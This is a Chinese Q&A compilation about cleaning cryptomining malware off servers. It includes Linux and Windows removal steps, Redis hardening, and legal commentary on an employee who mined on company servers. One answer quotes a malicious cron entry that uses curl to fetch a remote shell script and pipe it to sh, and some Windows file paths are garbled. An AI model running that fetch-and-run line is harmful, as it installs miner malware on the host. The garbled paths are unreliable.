服务器恶意挖矿

『壹』 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

『贰』 服务器集群感染了挖矿木马该怎么办

首先物理隔离，然后请专业的安全厂商来制定判断病毒类型，然后修补相关系统漏洞，然后利用专杀工具或者杀毒软件进行查杀

『叁』 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

『肆』 win2008服务器中了挖矿病毒，求解答！

不能完全杀干净的前提下，备份好自己的数据，然后重装系统，不然这样耽误工作真的很麻烦

『伍』 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

『陆』 蔚来员工利用公司服务器挖矿，这一行为是否违法

蔚来员工利用职务之便，从2021年2月开始使用公司服务器进行挖矿，从中获取利益，这个行为明显已经触犯了我国的相关法律。

其实利用公司资源进行非法挖矿行为早有先例，在2018年1月到5月期间，网络一个运维员工就曾经在网络公司服务器上安装挖矿程序，通过公司的资源谋取暴利，之后将挖矿所得的虚拟货币卖出，从中获得10万元人民币，后来，在网络公司的追查下，这名员工才被发现，并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年，并处罚金1.1万元，扣押违法所得10万元整。

而对于挖矿这个行为，国家是坚决打击的，目前相关的省份也出台了相关的文件，表面上只是提高了挖矿公司的电费，实际上是为了让从事挖矿的人员知难而退，因为电费一旦上涨，那么相对应的挖矿成本也就增加了。

综上所述，该蔚来员工利用职务之便进行挖矿行为，已经涉嫌非法控制计算机信息系统罪，所以，他极有可能会因为此罪名而被起诉。

『柒』 为什么黑客们要广设服务器，用别人的手机设备去挖矿

因为用别人的手机会更加安全一点，这样公安局或者安全局就不容易找到黑客的地址了。

“偷矿”是指未经你同意的情况下，黑客利用你的系统资源挖掘虚拟货币。这主要借助于网站的 JavaScript 代码，黑客在代码中注入“偷矿”程序，当你访问这些代码时，“偷矿”程序便会偷偷自动运行。

虽然 Chrome 是最常用的浏览器，但是 Opera 浏览器提供了一些 Chrome 没有的有趣功能。最新版本的 Opera 浏览器能够自动拦截广告，此外，它还内置了阻止挖矿的防护功能。这一功能可以阻止网站擅自运行非法挖矿的脚本，这与网页上的广告拦截技术并没有太大区别。

2.使用清理程序

如果采用了上面的措施之后你仍然放心不下，那么可以在电脑和智能手机上安装 Malwarebytes 清理程序，它的电脑版是完全免费的，但是针对手机的高级版是收费的。随着现在越来越多的区块链项目开始采用手机挖矿，如果你不想让自己的手机有被当作肉鸡的风险，适当花点小钱也是值得的。

你仍然可以继续使用像卡巴斯基这样的防病毒软件来保护自己的智能手机。

『捌』 服务器上如何清除NrsMiner挖矿病毒

挖矿病毒完整清除过程如下，请在断网情况下进行：

1.停止并禁用Hyper-VAccess Protection Agent Service服务；

2.删除C:Windowssystem32NrsDataCache.tlb；

3.删除C:.dll，若删除失败，可重命名该文件为其他名称；

4.重启计算机；

5.删除C:Windowssystem32SysprepThemes和C:WindowsSysprepThemes目录；

6.删除C:Windowssystem32SecUpdateHost.exe。

7.到微软官方网站下载对应操作系统补丁，下载链接如下：https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

8.安装国内主流杀毒软件，及时更新至最新病毒特征库。

『玖』 服务器被下挖矿了怎么办

哥们被下了啥挖矿？去举报啊。之前流量矿石非常火的时候，我的服务器也被无良黑了，成了肉鸡，然后我去找到他的信息，截图跟流量矿石举报，就帮我处理了。你看你的被下了啥，就去找他们处理。

『拾』 蔚来员工用公司服务器挖矿，已供认不讳，这位员工会如何被法律制裁

蔚来员工用公司服务器挖矿，已经供认不讳了，这个员工的行为已经触犯了刑法里面的非法控制计算机信息系统罪。犯了这项罪名的，可能会处三年以下有期徒刑或者是拘役，并处或者是单处罚金。情节特别严重的处三年以上7年以下有期徒刑并处罚金。

希望大家都不要抱有侥幸心理，不要让自己的日子过得越来越有判头。我们在那个工作岗位上面就需要做哪一份工作，做自己分内的工作，而不是超出范围之外。更不要利用自己的职务之便，去谋取不当之财。否则等待你们的就是一双银手镯，而不是其它的东西。